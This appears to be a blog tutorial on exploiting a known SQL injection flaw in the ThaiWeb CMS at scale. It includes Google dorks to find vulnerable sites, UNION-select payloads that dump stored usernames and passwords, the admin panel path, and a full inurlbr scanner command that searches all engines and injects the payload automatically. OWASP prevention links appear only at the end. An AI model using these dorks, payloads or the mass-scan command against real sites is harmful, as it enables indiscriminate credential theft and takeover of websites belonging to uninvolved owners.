Exploring cms THAIWEB with sql injection then we will use inurlbr scanner for mass exploitation.
We are located in Bangkok Thailand. Our systems are based on UNIX system and opensource approach.
We believe in sharing knowledge, and we hope our knowledge will help everyone developing and becoming a higher standard.
We hope to see Thai web builders upgrading themselves to become a professional living in the big world of internet internationally.
Fail discovery by:
Iran Cyber Security Group - Pi.Hack (www.Iran-Cyber.Org)
Description:
The vulnerabilities are located in the id_run value of the `index.php` file. Remote attackers are able to execute own sql commands by manipulation of the GET method request with the vulnerable id_run parameter. The request method to inject the sql command is GET and the location of the issue is application-side.
References (Source):
http://www.vulnerability-lab.com/get_content.php?id=1555
Release Date:
2015-07-23
Vulnerability Laboratory ID (VL-ID):
1555
Common Vulnerability Scoring System:
8.6
Vendor Homepage:
http://www.thaiweb.net/
Google Dork:
"Powered by ThaiWeb"
"Reserved. Powered by Thaiweb."
inurl:"index.php" "Powered by Thaiweb"
PoC:
- http://target/index.php?Content=product&id_run=[ID]'[SQL INJECTION VULNERABILITY!]
- http://target/index.php?Content=product&id_run=-12+union+select+1,2,3,group_concat%28user,0x3a,pws%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+user--
Admin Page:
www.target.com/_adminP/
Using inurlbr scanner for mass exploitation:
Download script: https://github.com/googleinurl/SCANNER-INURLBR
- Creating our command
SET DORK:
--dork 'YOU_DORK'
OR
--dork-file 'YOU_FILE_DORK.txt'
SET SEARCH ENGINES:
-a all
we will use all the search engines available in the script
SET FILTER RESULTS:
--unique
Filter results in unique domains.
removes all gets the URL
SET OUTPUT FILE:
-s ThaiWeb.txt
SET TIPE VALIDATION:
-t 2
2 The second type tries to valid the error defined by: -a 'VALUE_INSIDE_THE _TARGET'
It also establishes connection with the exploit through the get method.
SET EXPLOIT REQUEST - GET:
--exploit-get {YOU_GET}
Before setting the exploit we get to manipulate its string, for that we use a domestic function of inurlbr scanner so passes a validation string within the SQL injection to be able to separate vulnerable targets.
Internal function - Converting strings in hexadecimal
hex Encrypt values in hex.
Example: hex({value})
Usage: hex(102030)
Usage: --exploit-get 'user?id=hex(102030)'
Result inject:
http://www.target.gov.br/user?id=313032303330
--exploit-get '/index.php?Content=product&id_run=-12+union+select+1,2,3,group_concat%28user,0xhex(:),pws,0xhex(:),0xhex(inurlbr_vuln)%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+user'
hex(inurlbr_vuln) = 696e75726c62725f76756c6e
hex(:) = 3a
Example injection:
http://www.target.gov.br/index.php?Content=product&id_run=-12+union+select+1,2,3,group_concat%28user,0x3a,pws,0x3a,0x696e75726c62725f76756c6e%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+user
SET STRING VALIDATION:
Specify the string that will be used on the search script:
Example: -a {string}
Usage: -a '<title>hello world</title>'
If specific value is found in the target he is considered vulnerable.
Setting: -a 'inurlbr_vuln'
Let's validate the string "inurlbr_vuln" as she passed within the SQLI exploit, if such value appear on our target was successfully injected.
OUTPUT PRINT:
ADMIN PAINEL:
COMMAND FULL:
php inurlbr.php --dork '"Powered by ThaiWeb"' -s ThaiWeb.txt -q all -t 2 --unique -a 'inurlbr_vuln' --exploit-get '/index.php?Content=product&id_run=-12+union+select+1,2,3,group_concat%28user,0xhex(:),pws,0xhex(:),0xhex(inurlbr_vuln)%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+user'
OUTPUT PRINT:
Source discovery:
http://seclists.org/fulldisclosure/2015/Jul/109
Solution - Fix & Patch:
The security vulnerability can be patched by a secure parse and encode of the vulnerable id_run parameter value in the index.php file.
Restrict the input and use a prepared statement to secure the sql statement request via GET method.
How to Avoid SQL Injection Vulnerabilities
See the OWASP SQL Injection Prevention Cheat Sheet.
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
See the OWASP Query Parameterization Cheat Sheet.
https://www.owasp.org/index.php/Query_Parameterization_Cheat_Sheet
See the OWASP Guide article on how to Avoid SQL Injection Vulnerabilities.
https://www.owasp.org/index.php/Category:OWASP_Guide_Project
https://www.owasp.org/index.php/Guide_to_SQL_Injection
How to Review Code for SQL Injection Vulnerabilities
See the OWASP Code Review Guide article on how to Review Code for SQL Injection Vulnerabilities.
https://www.owasp.org/index.php/Category:OWASP_Code_Review_Project
https://www.owasp.org/index.php/Reviewing_Code_for_SQL_Injection
How to Test for SQL Injection Vulnerabilities
See the OWASP Testing Guide article on how to Test for SQL Injection Vulnerabilities.
https://www.owasp.org/index.php/Category:OWASP_Testing_Project
https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OTG-INPVAL-005)
